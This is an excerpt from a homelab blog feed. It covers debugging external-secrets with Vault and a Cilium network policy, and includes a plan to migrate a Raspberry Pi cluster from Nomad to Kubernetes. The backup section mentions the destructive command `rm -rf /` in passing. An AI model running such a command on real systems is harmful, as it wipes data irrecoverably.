<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/my_kubernetes_secrets/cluster/testsecret secret<span style="color:#f92672">=</span>supersecretpw
</span></span></code></pre></div><p>Then, an <code>ExternalSecret</code> manifest using the previously created <code>my-vault-store</code>
secret store can be created:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsecret</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">mysecret</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/testsecret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>Once that manifest has been deployed, external-secrets will create a Kubernetes
Secret called <code>testsecret</code> in the namespace <code>external-secrets</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n external-secrets secrets testsecret -o yaml
</span></span><span style="display:flex;"><span>apiVersion: v1
</span></span><span style="display:flex;"><span>data:
</span></span><span style="display:flex;"><span>  mysecret: c3VwZXJzZWNyZXRwdw<span style="color:#f92672">==</span>
</span></span><span style="display:flex;"><span>immutable: false
</span></span><span style="display:flex;"><span>kind: Secret
</span></span><span style="display:flex;"><span>metadata:
</span></span><span style="display:flex;"><span>  annotations:
</span></span><span style="display:flex;"><span>    meta.helm.sh/release-name: external-secrets
</span></span><span style="display:flex;"><span>    meta.helm.sh/release-namespace: external-secrets
</span></span><span style="display:flex;"><span>    reconcile.external-secrets.io/data-hash: <span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>  creationTimestamp: <span style="color:#e6db74">&#34;2023-12-26T12:01:30Z&#34;</span>
</span></span><span style="display:flex;"><span>  labels:
</span></span><span style="display:flex;"><span>    app.kubernetes.io/managed-by: Helm
</span></span><span style="display:flex;"><span>    reconcile.external-secrets.io/created-by: <span style="color:#ae81ff">1235</span>
</span></span><span style="display:flex;"><span>  name: testsecret
</span></span><span style="display:flex;"><span>  namespace: external-secrets
</span></span><span style="display:flex;"><span>  ownerReferences:
</span></span><span style="display:flex;"><span>  - apiVersion: external-secrets.io/v1beta1
</span></span><span style="display:flex;"><span>    blockOwnerDeletion: true
</span></span><span style="display:flex;"><span>    controller: true
</span></span><span style="display:flex;"><span>    kind: ExternalSecret
</span></span><span style="display:flex;"><span>    name: testsecret
</span></span><span style="display:flex;"><span>    uid: <span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>  resourceVersion: <span style="color:#e6db74">&#34;1839454&#34;</span>
</span></span><span style="display:flex;"><span>  uid: <span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>type: Opaque
</span></span></code></pre></div><p>Here, <code>target.name</code> is the name of the secret to be created, with <code>target.namespace</code>
being the namespace to deploy to.
Under <code>data</code>, the <code>secretKey</code> is the key under which the secret data will be
stored in the newly created Secret, and <code>remoteRef.key</code> is the path to the
secret in Vault, with <code>remoteRef.property</code> being the property of the resulting
JSON object at that path which contains the value to be stored in <code>secretKey</code>.</p>
<h1 id="network-policy-problems">Network policy problems</h1>
<p>While working on deploying specifically the Vault <code>ClusterSecretStore</code>, I
hit multiple errors. The first one was this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>Error: UPGRADE FAILED: cannot patch <span style="color:#e6db74">&#34;vault-backend&#34;</span> with kind ClusterSecretStore: Internal error occurred: failed calling webhook <span style="color:#e6db74">&#34;validate.clustersecretstore.external-secrets.io&#34;</span>: failed to call webhook: Post <span style="color:#e6db74">&#34;https://external-secrets-webhook.external-secrets.svc:443/validate-external-secrets-io-v1beta1-clustersecretstore?timeout=5s&#34;</span>: context deadline exceeded
</span></span></code></pre></div><p>It appeared whenever I tried to deploy the new <code>ClusterSecretStore</code>. I finally
tweaked to the fact that this was likely to do with my <code>CiliumNetworkPolicy</code>,
which at that point looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;external-secrets-deny-all-ingress&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span></code></pre></div><p>This is the canonical network policy for allowing all egress, while blocking
all ingress to all pods inside the namespace, save for traffic from pods in the same
namespace.
So I was extremely confused when I saw that network requests were getting
blocked. I removed the policy, and the deployment of the secret store worked
fine.</p>
<p>First, I confirmed that the policy was actually applied correctly. This can
be done with <a href="https://cilium.io/">Cilium</a>, the CNI plugin I&rsquo;m using, as follows.
Some documentation on troubleshooting can be found <a href="https://docs.cilium.io/en/stable/operations/troubleshooting/">here</a>.</p>
<p>First, get the host where the pod which blocks access is running:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get pods -n external-secrets -o wide
</span></span><span style="display:flex;"><span>NAME                                               READY   STATUS    RESTARTS   AGE   IP           NODE     NOMINATED NODE   READINESS GATES
</span></span><span style="display:flex;"><span>external-secrets-7fcd5969c8-sltbl                  1/1     Running   <span style="color:#ae81ff">0</span>          25h   10.8.4.173   sait     &lt;none&gt;           &lt;none&gt;
</span></span><span style="display:flex;"><span>external-secrets-cert-controller-fc578ccdd-mcksx   1/1     Running   <span style="color:#ae81ff">0</span>          25h   10.8.4.168   sait     &lt;none&gt;           &lt;none&gt;
</span></span><span style="display:flex;"><span>external-secrets-webhook-68c99c7557-nrqpz          1/1     Running   <span style="color:#ae81ff">0</span>          25h   10.8.5.60    sehith   &lt;none&gt;           &lt;none&gt;
</span></span></code></pre></div><p>Next, check which Cilium pod runs on that specific host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get pods -n kube-system -o wide
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>cilium-wcffs                       1/1     Running   <span style="color:#ae81ff">0</span>               5d22h   10.86.5.205   sehith   &lt;none&gt;           &lt;none&gt;
</span></span></code></pre></div><p>Then, I needed the correct Cilium endpoint for the pod I was interested in:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-wcffs -- cilium endpoint list
</span></span><span style="display:flex;"><span>ENDPOINT   POLICY <span style="color:#f92672">(</span>ingress<span style="color:#f92672">)</span>   POLICY <span style="color:#f92672">(</span>egress<span style="color:#f92672">)</span>   IDENTITY   LABELS <span style="color:#f92672">(</span>source:key<span style="color:#f92672">[=</span>value<span style="color:#f92672">])</span>                                                       IPv6   IPv4         STATUS   
</span></span><span style="display:flex;"><span>           ENFORCEMENT        ENFORCEMENT                                                                                                                        
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">1101</span>       Enabled            Disabled          <span style="color:#ae81ff">29452</span>      k8s:app.kubernetes.io/instance<span style="color:#f92672">=</span>external-secrets                                          10.8.5.60    ready   
</span></span><span style="display:flex;"><span>                                                           k8s:app.kubernetes.io/name<span style="color:#f92672">=</span>external-secrets-webhook                                                           
</span></span></code></pre></div><p>Finally armed with the <code>ENDPOINT</code> identifier, <code>1101</code> here, we can display the
policy rules applied to it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-wcffs -- cilium endpoint get -o yaml <span style="color:#ae81ff">1101</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>rule: <span style="color:#e6db74">&#39;{&#34;port&#34;:0,&#34;protocol&#34;:&#34;ANY&#34;,&#34;l7-rules&#34;:[{&#34;\u0026LabelSelector{MatchLabels:map[string]string{k8s.io.kubernetes.pod.namespace: external-secrets,},MatchExpressions:[]LabelSelectorRequirement{},}&#34;:null},]}&#39;</span>
</span></span></code></pre></div><p>This was exactly the rule I was expecting - allowing all traffic from the
<code>external-secrets</code> namespace.
While looking all this up, I also looked at the monitoring for the endpoint,
which can be looked at like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-wcffs -- cilium monitor --type drop
</span></span></code></pre></div><p>It spat out lines like this whenever I tried to deploy the secret store:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 1101, ifindex 6, file bpf_lxc.c:1968, , identity remote-node-&gt;29452: 10.8.0.17:59258 -&gt; 10.8.5.60:10250 tcp SYN
</code></pre><p>What I did not realized for way too long: The source IP, <code>10.8.0.17</code>, wasn&rsquo;t
coming from any pod in my entire cluster. I just couldn&rsquo;t figure out what that
IP was. It&rsquo;s in the CIDR for my cluster pods, but it&rsquo;s not showing up in the
<code>kubectl get -A pods -o wide</code> output.</p>
<p>After an exceedingly long time spend searching for the root cause, I finally
found it, through sheer dump luck. I had switched into the terminal of my VM
host, where the output of a previous <code>lxc ls</code> command was still visible.
And lo and behold, there was the IP, as the <code>cilium_host</code> network interface for
one of my control plane nodes.</p>
<p>Some digging later, I found out that this is a network interface created by
Cilium, and it is used for the traffic of all static, host networking using
pods on a host.
This also explained why I never saw any error in the logs of any of the
external-secrets pods. The request wasn&rsquo;t made by any of them. The <code>webhook</code>
pod runs a webhook which is used when deploying new secret stores, to verify
them before the Kubernetes objects are created.
This means the hook isn&rsquo;t triggered by any external-secrets pod, but by the
kube-apiserver.</p>
<p>Going a bit further, I just wanted to allow the kube-apiserver ingress into
the webhook pod. This also did not work, because there wasn&rsquo;t actually any
identity for it, as the pod&rsquo;s networking is not controlled by Cilium.</p>
<p>After a while, I looked back at the Cilium monitoring line:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 1101, ifindex 6, file bpf_lxc.c:1968, , identity remote-node-&gt;29452: 10.8.0.17:59258 -&gt; 10.8.5.60:10250 tcp SYN
</code></pre><p>Note the <code>identity remote-node</code>. Luckily, Cilium defines an entity for that,
see the docs <a href="https://docs.cilium.io/en/latest/security/policy/language/#entities-based">here</a>.
So what finally solved my problem was to add the following network policy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;external-secrets-allow-webhook-all&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">external-secrets-webhook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">remote-node</span>
</span></span></code></pre></div><p>This allows ingress to the webhook pod from any remote node. These remote nodes
are all nodes in the Kubernetes cluster which are not the local node where
the pod is running. It isn&rsquo;t quite as secure as explicitly defining that
only the kube-apiserver pods can access the webhook pod, but it will have
to do for now, as the kube-apiserver is not under Cilium control and hence it
cannot be controlled by, for example, using its labels. I will have to return
to this issue at a later point and see whether I can do better.</p>
<h2 id="the-ca-cert-formatting-problem">The CA cert formatting problem</h2>
<p>After I had finally fixed the networking issue, I got another error, this time from
the external-secrets pod itself. It was not able to connect to Vault:</p>
<pre tabindex="0"><code>[...]&#34;error&#34;:&#34;could not get provider client: unable to log in to auth met hod: unable to log in with app role auth: Put \&#34;https://vault.example.com/v1/auth/approle/login\&#34;: tls: failed to verify certificate: x509: certificate signed by unknown authority&#34;[...]
</code></pre><p>This was somewhat expected, because my Vault access does not go through my
proxy, and uses my Homelab internal CA.</p>
<p>I thought this problem would be easily fixable, as external-secrets does provide
settings in the <code>ClusterSecretStore</code> for providing a CA cert for server cert
validation. See the docs <a href="https://external-secrets.io/latest/api/spec/#external-secrets.io/v1beta1.VaultProvider">here</a>.
But I had really rotten luck with the <code>caBundle</code> config. I&rsquo;m getting the PEM
formatted CA cert directly from Vault, which runs my internal CA. But I couldn&rsquo;t
get it into a format which external-secrets would accept. Whatever I tried,
introducing newlines, putting the cert through <code>b64enc</code>, nothing worked. I was
just getting CA cert parsing errors from external-secrets.</p>
<p>What finally worked was to use the <code>caProvider</code> option instead. For this,
I created an additional secret (even though the CA cert isn&rsquo;t exactly a secret):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-internal-ca</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><p>And then I used that secret in the <code>caProvider</code> section as seen above. This was
an extremely frustrating journey. Through the networking problem, I at least
learned something about Cilium networking and how to debug it and finally found
the root cause and an acceptable fix.
But in this case, the only thing I got out of it was a high dosage of frustration
and a workaround switching to a completely different approach.</p>
<h1 id="conclusion">Conclusion</h1>
<p>First service set up successfully on the production k8s cluster. &#x1f389;
But also lots of frustration. Finding the fix for the networking problem was
pretty frustrating, but at least I learned a bit about Cilium debugging.
But the formatting problem got me pretty riled up.</p>
<p>If anyone reading this has any good ideas about how to produce a Cilium network
policy which only allows access from the kube-apiserver instead of the
&ldquo;allow all cluster nodes&rdquo; setup I&rsquo;ve got now, hit me up on the <a href="https://social.mei-home.net/@mmeier">Fediverse</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 0: The Plan</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-0-plan/</link>
      <pubDate>Mon, 18 Dec 2023 21:53:39 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-0-plan/</guid>
      <description>My plan for migrating my Nomad cluster to Kubernetes</description>
      <content:encoded><![CDATA[<p>In a <a href="https://blog.mei-home.net/posts/hashipocalypse/">previous post</a>, I had noted that
due to HashiCorp&rsquo;s recent decisions about the licensing for their tools, I
was thinking about switching away from Nomad as my workload scheduler.</p>
<p>Since then, HashiCorp made a change to the Terraform registry&rsquo;s Terms of Service
which only allowed usage with HashiCorp Terraform. This was obviously an action
against <a href="https://opentofu.org/">OpenTOFU</a>, and it reeked of pure spite. That
turned my musings about the future of my Homelab from &ldquo;okay, this leaves a bad taste&rdquo;
to &ldquo;Okay, I just lost all trust in HashiCorp&rdquo;. So Kubernetes it is.</p>
<p>Just to make one thing clear: Both Nomad and Consul, which I will be replacing
here, worked great for me. They provided everything I could have wished for, in
a rather lightweight package. And the integration was excellent. I also think
the documentation for all HashiCorp tools deserves a lot of praise.
There&rsquo;s no technical reason to replace Nomad and Consul. It&rsquo;s purely due to the
license change, and even more so due to the ToS change which followed.</p>
<p>After <a href="https://blog.mei-home.net/tags/kubeexp/">some experimentation</a> with Kubernetes, I&rsquo;m
satisfied that it&rsquo;s going to work for everything which I&rsquo;m currently doing with
Nomad, and I&rsquo;ve spend the last few weeks on making a plan to migrate.</p>
<p>My one main goal here is to make the migration as incremental as possible.
To me, this has the advantage of reducing the pressure, because I can just
migrate service-by-service, slowly, at any pace which fits the rest of my life.</p>
<p>To this end, I intend to run my Nomad and Kubernetes clusters in parallel. The
one big problem with this: Depending on time and motivation, this might draw
out the migration quite a bit. I might still be running two workload schedulers
come spring 2024. &#x1f605;</p>
<h1 id="the-current-situation">The current situation</h1>
<p>Let&rsquo;s start with the current state.
<figure>
    <img loading="lazy" src="homelab-before.svg"
         alt="A stylized graphic of my Homelab setup. In the middle are eight boxes containing the Raspberry Pi, Nomad and Consul logos. They are all labeled &#39;Raspberry Pi CM4 8G Worker&#39;. Above them are three further boxes, with all the previous logos plus the Ceph and Vault logo. They are labeled Raspberry Pi 4 4GB Controller. To the side are three more boxes, only containing the Ceph logo labeled &#39;Ceph Storage Host&#39;"/> <figcaption>
            <p>The current state of my Homelab.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;m running most of the Homelab on Raspberry Pi 4s. Three of them with 4GB RAM serve as controllers,
hosting one Vault, Nomad and Consul server as well as Ceph MON daemons each,
for high availability purposes. My main workhorses are the eight Pi CM4 with 8GB,
each hosting a Consul and Nomad client running my workloads. Storage is provided
by three x86 machines, each with one HDD and one SSD.</p>
<p>Nomad is the main workload scheduler. Consul provides both, service discovery
and authenticated as well as encrypted connections between different Nomad jobs.
Vault is used for secrets, not only within Nomad jobs but also for example by
my Ansible playbooks.</p>
<p>Ceph provides storage to Nomad jobs via CSI as well as the root disks for the
eight worker Pis, which <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">netboot</a> and
are completely diskless.</p>
<p>At the time of writing, 70% of the cluster&rsquo;s CPU and 46% of the RAM are assigned
to jobs. But in reality, the cluster overall is about 90% CPU idle. All of this
together currently eats about 150W.</p>
<h1 id="the-plan">The Plan</h1>
<p>As noted, I would like to do the migration incrementally, keeping everything up
as much as possible. The first challenge in that was more hardware to run the
two clusters in parallel. Luckily, I&rsquo;ve got my old x86 machine from before I
ventured into multi-host territory. It is an Intel 8C/16T CPU with 64 GB of RAM
and a couple 500 GB SSDs. That&rsquo;s more than enough power to run my entire
Homelab, if necessary.
In addition, I&rsquo;ve got my spare disks for when one of the prod disks fails, a
2TB SSD and a 6GB HDD.</p>
<p>I already used the x86 machine as the host for my Kubernetes experiments and
will now use it in a similar way, with LXD VMs running three Kubernetes controllers,
one Ceph host for using the disks and a couple worker VMs.</p>
<h2 id="preparation">Preparation</h2>
<p>To begin with, I will create the aforementioned VMs and init the cluster itself.
After that, I will migrate the first host. This will also double as a test to
see whether everything works fine on Raspberry Pis, and I will also be writing
an Ansible playbook to remove all the Nomad cluster&rsquo;s tools from a host.</p>
<p>Once that&rsquo;s done, the first couple of services will be foundational stuff, like
<code>external-dns</code> and <code>external-secrets</code>. Then the first migrated Pi will become
the Ingress host with a <code>Traefik</code> deployment.</p>
<h2 id="ceph">Ceph</h2>
<p>I will continue using Ceph. It has served me very well in the past two years and
I know my way around it by now. But instead of continuing with the current
baremetal cluster, I will go with <a href="https://rook.io/">Ceph Rook</a>, a Ceph cluster
deployed in Kubernetes. This approach will have the advantage that I will be
able to use the Ceph hosts also for other workloads than Ceph.</p>
<p>Sadly, Ceph Rook does not support any kind of import from a baremetal cluster.
There is no way to create daemons in Rook and join them into a baremetal cluster.
As a consequence of that, I will be setting up a fresh cluster in Kubernetes,
and then slowly migrate the data over as I migrate hosts and services from Nomad
to Kubernetes. Luckily, my cluster is still empty enough that I can take one
host out of the baremetal cluster and add it, and its disks, to the Rook cluster,
so that I will have one VM using my spare disks and one of the baremetal hosts
in the Rook cluster, and the other two baremetal hosts will stay in the
baremetal cluster.</p>
<p>For the data transfer, I will very likely just use <code>rsync</code>, as the export/import
doesn&rsquo;t make much sense especially for CSI volumes, as they will be created and
maintained by Rook/Kubernetes, so importing them as whole volumes would need
even more config to make sure the volume request gets the existing volume.</p>
<p>For the setup itself, I will need to create a number of StorageClasses. There
will be two for RBD volumes, the main volume type for my CSI volumes. One will
be SSD, one HDD, depending on which kind of performance is needed by a given
service. Then there will also
be a CephFS class, for those few cases where I need multiple writer capabilities.
The same goes for the S3 StorageClass. These two only get HDD variants, as I
don&rsquo;t expect high throughput requirements here anyway.</p>
<h2 id="s3-content">S3 content</h2>
<p>After the Ceph Rook cluster is set up, the first data to be migrated will be
all the S3 buckets which are not directly related to a specific service. These
are mostly my <code>restic</code> backups and some misc stuff, like the Terraform bucket.</p>
<h2 id="migrating-the-logging-setup">Migrating the Logging setup</h2>
<p>This is going to be the first actual migration. Because I don&rsquo;t care too much
about my previous logs, I will simply create a completely new setup and not
bother to transfer the S3 bucket with my logs.</p>
<p>The setup will be similar to my current Nomad setup. Loki will do log storage,
which will be accessed via Grafana. Then comes my FluentD instance, which
aggregates the logs and unifies them, e.g. making sure there is only one level
for &ldquo;info&rdquo;, instead of <code>INF</code>, <code>info</code> and <code>I</code>. That instance will push logs to
Loki. I will also redirect all my logs, meaning syslogs from hosts and service
logs from Fluentbit, to this k8s instance and then retire Loki/FluentD from my
Nomad setup.</p>
<p>As said, should be relatively simple because I don&rsquo;t care about preserving past
logs.</p>
<p>At this point, the k8s cluster will be running the logging setup for the entire
Homelab. So it will have become load-bearing.</p>
<h2 id="setting-up-metrics-gathering">Setting up metrics gathering</h2>
<p>This part is a bit more complicated because I won&rsquo;t be migrating my old metrics
stack with Prometheus and Grafana over 1:1. Instead, I will start using the
<a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>.
Here I do want to preserve old data, as I like looking at older metrics as well
as current ones.
This showed the first challenge during planning: In Nomad, volumes are created
separately from the main job. For Kubernetes, I will be using Helm as my &ldquo;job&rdquo;
management tool. My current idea for cases where I want to migrate data over
is to do the first deployment of the Helm chart with zero replicas for the pod,
thus just creating everything else including volumes.</p>
<p>Another interesting difference is going to be Grafana. From everything I understand
now, Grafana&rsquo;s Helm chart relies on <a href="https://grafana.com/docs/grafana/latest/administration/provisioning/">provisioning</a>
for things like data sources, dashboards and the like. And in principle, I like
the idea of having my dashboards in Git. But it remains to be seen how much
exporting them to Git after every change starts annoying me.</p>
<p>On the positive side: Lots more data and pretty graphs about Kubernetes to look
at. &#x1f604;</p>
<p>The idea here is similar to the logging section: I will retire my Nomad setup
and let the k8s Prometheus instance do all the scraping for the Homelab.</p>
<p>One open question is going to be about the CSI volume utilization data. At the
moment, I&rsquo;m running a cronjob on all workers which regularly reports the
results of a filtered <code>df -h</code> via the local <code>node-exporter</code>&rsquo;s <code>textfile</code> feature.</p>
<h2 id="setting-up-a-docker-registry">Setting up a docker registry</h2>
<p>At the moment, I run two Docker registries. One for my own Docker images, and
one as a pull-through cache for DockerHub. I will be trying out Harbor to see
how I like it.</p>
<h2 id="backups">Backups</h2>
<p>My backup setup currently consists of some simple Python scripting driving
<code>restic</code>, which does incremental backups of all locally mounted volumes every
night to my Ceph S3. This doesn&rsquo;t get me more redundancy, as the S3 is stored
on the same disks as the (mostly) Ceph RBD volumes used with CSI. But it does
protect me from fat-fingered <code>rm -rf /</code> commands. I will go into more detail
about what I&rsquo;m doing exactly in a separate post when I find the time.</p>
<p>In addition, I&rsquo;ve got a second job which downloads all of the backup S3 buckets
onto an external HDD via <code>rclone</code>.</p>
<p>No off-site backup yet. &#x1f62c;</p>
<p>This part will likely require at least a limited rewrite of my Python scripting.
Due to the fact that the backups run per node and backup whatever happens to
run there at the time the backup job runs, I will be able to continue running
the per-node backup job on both clusters in parallel, as they will be backing
up different service&rsquo;s data to different backup S3 buckets.</p>
<h2 id="service-migration">Service migration</h2>
<p>With all of the previous sections, all of the infrastructure is now in place
and I can begin migrating the services.
Here is an overview:
<figure>
    <img loading="lazy" src="service_deps.png"
         alt="A dependency diagram of the services in my Homelab. It shows 27 different services, ranging from Audiobookshelf to zigbee2mqtt. The largest number of connections go into Traefik, my Ingress proxy, and into CephRBD, which provides storage for services. There are two clusters. On the one side is Prometheus, with dependencies onto a number of smaller services like Mosquitto for MQTT or UptimeKuma for monitoring and service availability. On the other side is a service clustered around Postgres and Redis. Here are the heavier services, like Mastodon, Wallabag, Keycloak, Jellyfin and so forth."/> <figcaption>
            <p>An overview of my services and their dependencies.</p>
        </figcaption>
</figure>
</p>
<p>The first service to be created will be Postgres. Here, I decided to go with
a proposal from <a href="https://transitory.social/@rachel">Rachel</a>, <a href="https://cloudnative-pg.io/">cloudnative-pg</a>.
I will then migrate each databases when I migrate the service using it, via
importing/exporting.</p>
<p>After that will come <code>Audiobookshelf</code>. This service will serve as a testbed for
service migration, and I will write up some documentation on service migration
and create a Helm chart template for the rest of the migrations.</p>
<p>After that I don&rsquo;t expect many surprises. Where available, I will use the official
Helm chart for a service. Otherwise, I will be writing my own. Each individual
migration will consist of deploying the Helm chart first with zero replicas,
to create e.g. S3 buckets or CSI volumes. Then I will migrate databases, volume
and S3 data and then start up the k8s instance with Ingress via my Traefik.</p>
<p>Somewhere in the middle of all this, I will also have to update my host update
Ansible playbook, to properly fence off the Kubernetes hosts before rebooting
them.</p>
<p>The one service which I thought might be problematic is <code>Drone CI</code>. By default,
its runner runs CI pipelines in Docker. From what I&rsquo;ve read, I might be able to
setup Docker-in-Docker pods and run there. But quite honestly, the Docker runner
requires mounting in the Docker socket, giving the runner root access, and I
had planned to migrate to <code>Woodpecker</code> anyway. So I will just do this as part
of the Kubernetes migration, as Drone CI&rsquo;s Kubernetes runner is still marked
experimental, while Woodpecker&rsquo;s isn&rsquo;t.</p>
<h2 id="cleanup">Cleanup</h2>
<p>The final step, after all workers are in Kubernetes, will be to migrate the
three Raspberry Pi 4 controller nodes over to serve the Kubernetes cluster. This
will be a bit complicated. I can shut down the Nomad cluster completely once the
last job is done, but the Consul cluster is different.</p>
<p>There are two things which rely on it: First, proper scraping of the Ceph cluster
MGR daemon for metrics. Here Consul&rsquo;s healthcheck connected DNS is currently
used to find the active MGR instance.
Second, access to my three Vault servers requires Consul for high availability.
Here, I&rsquo;m still not sure how I will solve this. I might possibly just migrate
the Vault cluster into Kubernetes as well.</p>
<p>Once the last few bits of data are cleared from the baremetal Ceph cluster,
I can finally migrate over the two baremetal servers to the Ceph Rook cluster.
To begin with, I will have them restricted to Ceph pods, but I will also test
